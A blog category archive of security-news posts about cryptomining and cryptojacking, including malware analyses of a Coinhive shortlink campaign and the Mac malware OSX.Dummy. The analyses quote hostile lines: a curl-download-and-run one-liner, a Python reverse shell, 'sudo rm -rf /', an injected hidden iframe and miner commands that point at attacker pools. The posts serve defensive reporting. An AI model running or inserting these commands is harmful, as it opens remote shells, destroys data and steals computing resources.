Category Archives: cryptomining

How To Fry An Egg On a Cryptojacked Router

After reading the title of this article, you may think of me as insane. But, believe me, it’s no joke!

How To Fry An Egg On a Cryptojacked Router on Latest Hacking News.

Update MikroTik routers – 170,000 devices hit by cryptocurrency malware

By Waqas

Currently, the malware is targeting unpatched MikroTik routers in Brazil but researchers believe it’s about time it will spread worldwide. Unpatched routers manufactured by MikroTik have become potential targets of cryptojacking malware campaigns in Brazil. According to the analysis of Trustwave’s security researcher Simon Kenin, an unprecedented increment in web-based cryptojacking/cryptomining attacks in Brazil has […]

This is a post from Read the original post: Update MikroTik routers – 170,000 devices hit by cryptocurrency malware

A week in security (July 30 – August 5)

Last week, we posted a roundup of spam that may have landed in your mailbox, talked about what makes us susceptible to social engineering tactics, and took a deep dive into big data.

Other news:

  • Facebook claimed to have removed accounts that display behavior consistent with possible Russian actors engaged in misinformation. (Source: The Wall Street Journal)
  • Yale University disclosed that they were breached at least a decade ago. (Source: NBC – Connecticut)
  • High school students, be on the lookout! If you receive email or snail mail from organizations with impressive-sounding names, consider that it may just be a carefully packaged marketing scheme. (Source: Sophos’s Naked Security Blog)
  • A researcher from Amnesty International revealed that hackers have targeted them with malware from an Israeli vendor. (Source: Motherboard)
  • Certain e-commerce providers in the UK were affected by a data breach and exposed potentially more than a million user data. (Source: Graham Cluley’s blog)
  • A game on the Steam platform was found hijacking video game player machines to mine cryptocurrency. (Source: Motherboard)
  • The Alaskan Borough of Matanuska-Susitna was infected with malware that disrupted normal activities so much that they had to dust off old typewriters to continue issuing receipts. (Source: Sophos’s Naked Security blog)
  • While we’re on the subject of breaches, here’s another popular victim: Reddit. (Source: TechCrunch)
  • Google joined Apple in banning mining apps on the Play Store. (Source: Coin Central)
  • An independent security researcher from the UK spotted a DHL-themed spam carrying malware hidden in a GIF file. (Source: The SANS ISC InfoSec Forums)

Stay safe, everyone!

The post A week in security (July 30 – August 5) appeared first on Malwarebytes Labs.

ZombieBoy cryptomining malware exploits CVEs to evade detection

By Waqas

ZombieBoy malware makes $1,000 Monero on a monthly basis. An independent security expert James Quinn has discovered a new family of cryptominers that has been dubbed as ZombieBoy. According to Quinn’s analysis, the newly discovered cryptomining worm clocked in at 43 KH/s which means as per the on-going Monero rate, it is making $1,000 on a […]

This is a post from Read the original post: ZombieBoy cryptomining malware exploits CVEs to evade detection

ZombieBoy: New Crypto-Mining Malware Exploits Multiple CVEs

A new cryptomining malware called Zombieboy is on the prowl. Recently, this new addition to the cryptomining dynasty has clocked

ZombieBoy: New Crypto-Mining Malware Exploits Multiple CVEs on Latest Hacking News.

The trend toward cryptojacking: What it is and how businesses can prevent it

Digital attacks have evolved quite a bit in recent years. First, businesses and researchers observed a rash of ransomware, wherein encryption was exploited to lock users out of their data and files in an attempt to collect financial ransom.

Now, the next big wave in cybercriminal strategy has come, involving increasingly popular cryptocurrencies and the ability to leverage the computer power of unknowing users’ systems to mine a profit. This process is called cryptojacking – and it’s putting businesses and individual users all across the globe at potential risk.

Understanding cryptojacking: Defining the basics

Ahead of delving into this new cybercriminal process, let’s break down the underlying concepts.

Cryptojacking revolves around cryptocurrency mining, a process in which users leverage infrastructure systems and their computing power in order to verify digital transactions and reconcile associated hash function algorithms. This process enables users to create the next block of transactions in the blockchain, the digital, unchangeable ledger wherein all cryptocurrency transactions are recorded and compiled. Once a transaction is verified, the next block in the blockchain is created – once established, blocks within the blockchain and their associated transactions can not be adjusted or shifted.

“Each time a cryptocurrency transaction is made, a cryptocurrency miner is responsible for ensuring the authenticity of information and updating the blockchain with the transaction,” Webopedia explained. “The mining process itself involves competing with other cryptominers to solve complicated mathematical problems with cryptographic hash functions that are associated with a block containing the transaction data.”

The miner that is first able to resolve the hash functions is then able to authorize the transaction and earn a small profit in cryptocurrency for adding to the blockchain. It is this

competitive nature and potential for reward – despite only being a small amount per transaction – that has attracted hackers and other malicious actors to the arena.

Cryptojacking involves the fraudulent use of user systems for cryptocurrency mining.

Cryptocurrency mining vs. cryptojacking: What’s the difference?

Legitimate users, leveraging their own systems and the required specialized mining hardware, can engage in cryptocurrency mining. In fact, as noted above, the process is essential for verifying transactions hinging upon the use of cryptocurrency, and to support the continual growth of the underlying blockchain ledger.

However, there is a stark difference between legitimate and necessary cryptocurrency mining and malicious cryptojacking processes. The distinction here rests in authorized use.

Cryptocurrency miners utilize their own systems and therefore have authorized permission to leverage this computing power in order to solve the associated hash functions and create the next block of transactions in the blockchain. Those engaged in cryptojacking, on the other hand, breach and use someone else’s computing systems in an unauthorized manner.

Within cryptocurrency mining, the miner is the authorized user of the system being leveraged and reaps the small cryptocurrency reward for verifying transactions. Cryptojacking sees this reward delivered to the hacker who has broken in and is stealing the resources of another user’s systems.

As CSO contributor Michael Nadeau explained, the infection process is somewhat similar to other attack styles like ransomware.

“Hackers do this by either getting the victim to click on a malicious link in an email that loads cryptomining code on the computer, or by infection a website or online ad with JavaScript code that auto-executes once loaded in the victim’s browser,” Nadeau wrote. “Either way, the cryptomining code then works in the background as unsuspecting victims use their computers normally.”

Once infected, users are often unaware that their systems have been leveraged for cryptojacking by an unauthorized intruder. In this way, the malicious actor can allow the cryptomining software to operate in the background and enable them to earn a profit by verifying cryptocurrency transactions.

As Nadeau pointed out, the only somewhat tell-tale sign of cryptojacking is a slowdown or lag in performance or action execution, which can also be a symptom of an array of other types of infections or system issues.

There’s a substantial difference between cryptojacking and cryptocurrency mining.

Cryptojacking campaign discovered: Infected live support platform

Concrete evidence in the rise of cryptojacking lies in the increasing discovery of infected sites, spreading cryptomining software to unsuspecting visitors. Trend Micro reported on just such an instance in November 2017, wherein a considerably large cryptojacking campaign was uncovered, with a live chat and support platform at the center.

Security researchers discovered that nearly 1,500 websites that included a widget for the live chat and support platform were infected and being used for cryptocurrency mining.

“A copy of the Coinhive in-browser cryptocurrency miner was found inside a JavaScript file used by LiveHelpNow, a live chat and support platform that was being loaded on the websites,” Trend Micro reported.

This issue is worsened by the fact that the JavaScript code doesn’t have to be specifically installed in order to allow for cryptojacking – users need only visit the affected websites that include the LiveHelpNow widget including the Coinhive code. Once a user loads the webpage, the mining code runs automatically within their browser.

Many of the 1,500 sites impacted by the infected LiveHelpNow widget were e-commerce companies and small, private businesses. Interestingly, attackers chose an ideal time to put the cryptomining code in place – right ahead of the busy end-of-year shopping season.

Recognizable names including Everlast were included in the list of affected websites included in this cryptojacking campaign. Other organizations’ websites – including Politifact, Showtime and even Pirate Bay – have also been impacted by cryptomining code.

“Users accessing the affected websites will see their CPU usage shoot as Coinhive script mines the Monero cryptocurrency for another party,” Trend Micro noted.

The issue for businesses: Cryptojacking prevention

While cryptojacking is certainly a prominent risk for all users, the threat could hit enterprises particularly hard. When available CPU resources are being leveraged to support cryptomining, the performance of other platforms that rely on this support will suffer. This can prevent employees from properly engaging and using company platforms and necessary software. And while cryptocurrency mining and cryptojacking are still in their infancy, now is the time for organizations to prepare and guard against this threat.

First, it’s imperative to include cryptojacking as part of security awareness training. When workers and IT department members in particular understand what to look for, they can help reduce the risk. There are also ad-blocking and anti-cryptomining extensions that can be installed within web browsers to help avoid infections.

Endpoint protection and specific, robust solutions like Trend Micro Smart Protection Suites and Worry-Free Business Security can help safeguard organizations and their users through the fast detection and blocking of malicious files and websites.

To find out more, connect with the experts at Trend Micro today.

The post The trend toward cryptojacking: What it is and how businesses can prevent it appeared first on .

Cybercrime tactics & techniques Q2 2018

A generally slow quarter reflects an overall lull in cybercrime, picking up where Q1 left off with cryptominers continuing to dominate, ransomware continuing to evolve through experimentation, and exploits making a small but significant comeback.

In nearly every malware category for both business and consumer detections, we saw a decrease in volume, corroborating our general “Dang, it’s been a little too quiet in here” sentiments since starting the new year. Our relative malaise was punctuated, however, with some interesting developments moving from Q1 to Q2. What threat actors lacked in quantity they made up for in quality.

Malwarebytes’ top two consumer detections continue to be adware and cryptomining, respectively, while miners took over the number one spot for business detections in Q2. Spyware, which had a strong Q1 for business, dipped down by 40 percent to number five, while banking Trojans held steady in the number two position, despite dropping in detections by nearly 50 percent. Meanwhile, backdoors shot up on both the consumer and business side, with consumer detections increasing by 442 percent.

New developments in ransomware and cryptomining drove the market, as Q2 attacks generally showed more sophistication than their Q1 counterparts. The introduction of complex VPNFilter malware, which dropped multi-stage attacks on hundreds of thousands of unsuspecting small office and consumer users, shook the sleepy cybersecurity industry awake. While 2017 outbreaks such as WannaCry and NotPetya have been as yet unmatched in terms of distribution volume and impact, VPNFilter, SamSam, and other such complicated campaigns show that 2018 may just be the year of higher-level, targeted attacks.

So how did we draw these conclusions? As we’ve done for the last several quarterly reports, we combined intel and statistics gathered from April through June 2018 from our Intelligence, Research, and Data Science teams with telemetry from both our consumer and business products, which are deployed on millions of machines. Here’s what we learned about cybercrime in the second quarter of 2018.

  • Cryptomining still hot, but starting to decline
  • GandCrab the king ransomware variant
  • Adware up 19% over last quarter for consumers
  • VPNFilter debuts with over 500,000 detections
  • Exploits on the rise
  • Scammers increasingly targeting PII (Personally Identifiable Information)

To read more about the above as well as get a detailed look at detection statistics & predictions for next quarter. Download the:

Cybercrime Tactics & Techniques Report for Q2 2018

The post Cybercrime tactics & techniques Q2 2018 appeared first on Malwarebytes Labs.

Obfuscated Coinhive shortlink reveals larger mining operation

During the past several months, in-browser mining has continued to affect a large number of websites, predominantly relying on Coinhive’s infamous API. We documented several campaigns on this blog, in particular Drupalgeddon, where attackers are taking advantage of vulnerabilities in popular Content Management Systems (CMS) to compromise websites and push payloads both client- and server-side.

In the past weeks, our crawlers have catalogued several hundred sites using a variety of CMS all injected with the same obfuscated code that uses Coinhive’s shortlink to perform silent drive-by mining. By pivoting on this indicator of compromise, we were able to identify a larger infrastructure receiving traffic from several thousand hacked sites acting as doorways to redirect traffic to a central server involved in the distribution of both web and standard malware coin miners.

Figure 1: Mining operation fueled by compromised sites

Obfuscated miner injection

As part of our regular crawls, we look for known redirects to sites of interest and lately, most have been related to Coinhive domains. We detected hundreds of new domains, all legitimate websites that were injected with a blurb of hexadecimal code. Once decoded, it shows as an invisible iframe (1×1 pixel) to cnhv[.]co/3h2b2. We believe it is part of the same campaign that was exposed by the folks over at Sucuri at the end of May.

<i frame src="https://cnhv[.]co/3h2b2" width="1" height="1" align="left"></i frame>

Figure 2: A WordPress site injected with an obfuscated iframe loading Coinhive’s API

The cnhv[.]co domain name is used for what Coinhive calls shortlinks, essentially a way of monetizing on hyperlinks by making visitors’ browsers solve a certain number of hashes before they reach their destination site. When clicking on such a link, you will see a progress bar and within a few seconds, you will be redirected. Crooks are abusing this feature by loading those shortlinks as hidden iframes with an unreasonably high hash count.

Figure 3: Shortlink is taxing our CPU at 100% 

In Figure 3 where we made the iframe visible by by changing its dimensions, to show that rather than wait for a few seconds before being redirected, users will unknowingly be mining for as long as they stay on the page. Indeed, while Coinhive’s default setting is set to 1024 hashes, this one requires 3,712,000 before loading the destination URL.

Backdoor initiated redirection

Querying, we were able to find the same Coinhive key active as early as May 7 via a different redirection mechanism. There is a specific URI pattern indicating that hacked sites are being leveraged to perform a redirect to a server at 5.45.79[.]15. This in turn creates a redirection via another crafted URI where one of the parameters is the referrer site, ultimately leading to the Coinhive shortlink that will start the web miner.

Figure 4: The same shortlink was found loaded from a compromised website via an intermediary server

Several sites have been injected with both the hidden cnvh[.]co iframe method, as well as via backdoors:

Figure 5: A hacked site injected with Coinhive’s shortlink and multiple compromised URLs

The URI pattern used for the redirections can be identified by the following regular expression:

Figure 6: A regular expression showing a match between compromised sites

Blackhat SEO and doorways

Looking at those URIs again, we can note the presence of certain keywords that appear to be Search Engine Optimization (SEO) related, for instance:


We confirmed that indeed some Google or Bing searches showed us results that included the list of compromised sites that are acting as “doorways,” usually to a traffic distribution system or redirector (5.45.79[.]15). In this case, the doorways are used to trick people into downloading malicious coin miners instead of the file they were looking for.

Figure 7: Despite appearances, this file is not 100 percent clean

Note how the server at 5.45.79[.]15 is performing the redirection to another hacked sited (motoir[.]com), where the keywords passed from the URI are dynamically used to create what looks like a unique download page and file.

Figure 8: Web traffic showing the redirection sequence

Malicious coin miners

Upon execution, this executable will unpack the following three binaries:

  1. winsystem.exe: the XMRig miner
  2. clock.exe: .bat file wrapped into an EXE contains commands
  3. netflash.exe: a very simple downloader, written in .NET.

The batch script adds persistence by setting a registry entry, kills certain processes (possible miners already running), and starts mining by launching:

winsystem.exe -B -a cryptonight -o 37.1.197[.]121:80 -p x -u %COMPUTERNAME% +500 --max-cpu-usage=30 --donate-level=1 -k

Figure 9: Batch script revealing the mining code

The fake download binaries are based on the same code from a miner, unsurprisingly, hosted at 5.45.79[.]15/xxxphoto.exe. Using VirusTotal Intelligence, we were able to expand on this infrastructure and identify another coin miner, which is an ELF file this time, based on this cnrig library, hosted at: 5.45.79[.]15/monero/cnrig.

Figure 10: Graph showing an ELF and Win32 miner hosted on the same server

A comment left on this VirusTotal report page indicates that this miner was found on an infected server and pulled down from a PHP backdoor called zz1.php. Searching for that file name, we located a possible candidate uploaded to a public site. Decoding the Base64 encoded strings, we can assert with greater confidence that this is the malicious PHP file used by the attackers to download the Linux coin miner from 5.45.79[.]15/monero/cnrig:

Figure 11: PHP code uploaded into compromised sites responsible for ELF miner download

Once it has retrieved the ELF binary, it runs it, using the following command in order to begin mining:

./cnrig -o 5.61.46[.]146:80 --donate-level=1 > /dev/null 2>&1


Because the miners are connecting to private pools (and likely via proxy) without using a wallet address, we cannot assess how much money the perpetrators have generated with this scheme.

In fact, the server at 5.45.79[.]15 also has its own ProxyPanel:

Figure 12: A proxy based on xmrig-proxy

The XMRig version of the miner had a public stats page indicating that there were close to 500 infected machines that had participated in the mining activity. For the CNRig version, we weren’t able to find any such stat, although the number of hacked servers was much higher.

A growing number of sites

The interest surrounding cryptocurrencies has drastically changed the malware landscape with criminals hoping to get a piece of the action. As such, a growing number of websites are being compromised both client- and server-side to distribute and run coin miners.

In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online. In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners. Finally, it seems only fitting to see an abuse of Coinhive’s shortlinks to perform in-browser mining.

Malwarebytes blocks malicious mining, whether it is triggered by malware or loaded via compromised websites.

Thanks to @DynamicAnalysis for sharing additional information.

Indicators of compromise

String for obfuscated cnvh[.]co injection


Coinhive shortlink


Coinhive site key


Regex for compromised sites redirection


Redirection server


Windows miner dropper


Linux miner


The post Obfuscated Coinhive shortlink reveals larger mining operation appeared first on Malwarebytes Labs.

Mac malware targets cryptomining users

Last week, a security researcher named Remco Verhoef announced the discovery of a new piece of Mac malware being distributed on cryptomining chat groups. This malware was later further analyzed by Patrick Wardle, who gave it the rather appropriate moniker OSX.Dummy.

The malware was being distributed by chat users posing as admins, who posted the following shell script for users to run:

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

This script downloads an executable file named script from a malicious site, gives it executable permissions, then launches it. This script is a ridiculous 34 megabytes in size, and seems to do no more than create a shell script file and a launch daemon to keep it running.

The shell script itself uses Python to open a reverse shell to port 1337 on a malicious server, giving the hacker behind the malware continued access to the computer.

while :
  python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'
  sleep 5

All in all, this malware is not particularly exceptional, and it lives up to the name OSX.Dummy in multiple ways. However, there are a few interesting things to note about this malware.

Risks posed by posted scripts

The method of distribution is interesting. People on forums and other online sources have been giving instructions that involve running commands at the command line—in the Terminal on a Mac—for many years, and still do today.

As an example, one user on Apple’s forums used to give users a highly obfuscated shell command consisting of tens of thousands of characters, with instructions to copy and paste it into the Terminal to run it. This script was run by users of the forums, and the output of the script posted there—thousands of times.

Fortunately, this script was not malicious, but it easily could have been, and its obfuscated nature should have raised suspicions. Yes users still ran it, without any understanding of what it did, because they trusted a stranger on a forum.

There have been other cases in the past of scripts being posted that were actually malicious in nature. The most well known of these was an infamous trick where users were told to run the following command to cure whatever problem they were having:

sudo rm -rf /

Unfortunately for users who actually followed directions like these, this command actually erases the hard drive.

Thus, there’s precedent for being suspicious of shell scripts posted online, yet even so, many people will still run highly suspicious scripts without a care. Readers are encouraged to educate users about the dangers of this behavior at every opportunity.

Risks posed by previous infections

When first run, the script executable asks for a password. This looks like the standard sudo behavior in the command line, but actually, the malware is getting the password. The malware creates a couple small data files called dumpdummy—one in /Users/Shared/ and one in /tmp/—and stores the password there, presumably for possible future use.

Having your password stored in clear text inside a file that can be readable by anyone on the computer poses a serious security threat. Worse, since this file is just data and not actually malicious, it’s likely that most antivirus software won’t detect it. This means that you might have removed the infection, but the dumpdummy file remains, posing a possible future security risk.

This is far from the first time that malware has done such things. This means that, even if your computer is not currently infected, it’s entirely possible that your password can be found in clear text somewhere on your hard drive, as a remnant from a previous infection. Future malware could be designed to find the locations of these files created by the previous malware, gaining access to your password for free.

Malwarebytes for Mac will remove such traces in addition to the malicious executables.

Risks posed by unsigned malware

Most, though not all, Mac malware these days is cryptographically signed with a certificate issued by Apple. These certificates are not hard to obtain, costing no more than $99 to get a developer account with Apple. The good thing about this is that once the malware is spotted by Apple, the certificate can be revoked, killing the malware.

However, there are some issues with the way macOS handles code signing, and this can’t be relied on. As Wardle pointed out in his analysis, the fact that this malware is not signed is irrelevant, since macOS does not check the code signature for a process that is executed from the command line.

More information on how code signing can be a problem on macOS will be presented at this year’s Virus Bulletin conference.

Target: cryptocurrency theft

In all, this malware is not highly likely to be widespread, and you’ll probably know if you’ve been infected after reading a description of the malware.

We don’t yet know exactly what the hacker(s) behind the malware may intend to do with access to the infected machines, but given the fact that cryptocurrency mining communities were targeted, it’s a fair bet that they were interested in theft of cryptocurrency.

If you think you might have been infected, Malwarebytes will remove the malware, including the dumpdummy files containing your password.

If you do IT or security work for a business, be sure to block access to the IP address that the shell script will try to connect to (

The post Mac malware targets cryptomining users appeared first on Malwarebytes Labs.

A week in security (June 25 – July 1)

Last week on Labs, we looked at comment moderation duties, Viagra spam on a news-making restaurant’s website, and how to manage your child’s online presence for Internet safety month. We also looked at a set of big breaches and leaks, as well as malware threats with a World Cup vibe.

Other news

Stay safe, everyone!

The post A week in security (June 25 – July 1) appeared first on Malwarebytes Labs.

Read: Our Top Picks for 2018’s Biggest Cybersecurity Stories… So Far

Our threat research team’s been burning the candle at both ends this year, what with the sheer number of nasties out there at any given time. But with so many to choose from, how did we populate a list with just seven cybersecurity threats, and why? For one, it’ll take the rest of the year to catalog the number of threats we’ve seen in just the first six months, and secondly… well, we’ll do another one of these in time.

So, we went ahead and picked the brains of a handful of our researchers and came up with a ‘cybersecurity’s most wanted’ list, to give you an overview of what’s been driving security teams up the wall. While this list is by no means exhaustive, it should give you some insight into the current application and data risks out there and what you should keep an eye on. Let’s crack on.

First off, we look at misconfiguration and incorrect deployment, which can leave resources unguarded and sensitive data up for grabs.

  • March 2018’s PostGreSQL Monero vulnerability report is a great example of how database serves were left wide open and vulnerable to attack.
  • Another one for the list is a recent report showing how open Redis servers were exposed to hackers, the culprit here again being the fact that the servers were left open.

A second and equally devastating threat emerges when security teams aren’t able to patch systems fast enough to counter the increasing pace of new threats popping up.

  • One of the year’s biggest ‘patch-fails’ was when unpatched Drupal apps were being hit by Drupalgeddon; leaving scores of sites vulnerable.
  • RedisWannaMine — which took aim at unpatched Windows machines — also made a splash earlier this year.

Thankfully, however, there are ways to defend against these kinds of threats. Adopting a layered security approach can be a strong defense against patching vulnerabilities, as well as putting in place a good patching management system.

Not to be left off a threat list, 2018 saw an increase in both the scale and severity of DDoS attacks.

Finally, as cryptocurrencies show no signs of slowing in terms of popularity, cryptomining – sometimes referred to as cryptojacking – attacks follow the same trajectory.

  • A favorite method for hackers is remote code execution – driving almost 90% of all cryptomining attacks globally.

The cybersecurity landscape is one of increasing complexity, and security teams have to equip themselves with tools that are scalable, accurate and make it easy to hone in and take action on action real threats. Pair this with financial constraints and a lack of skilled personnel in the industry as a whole and you begin to understand the mammoth challenge so many face in securing their applications and data.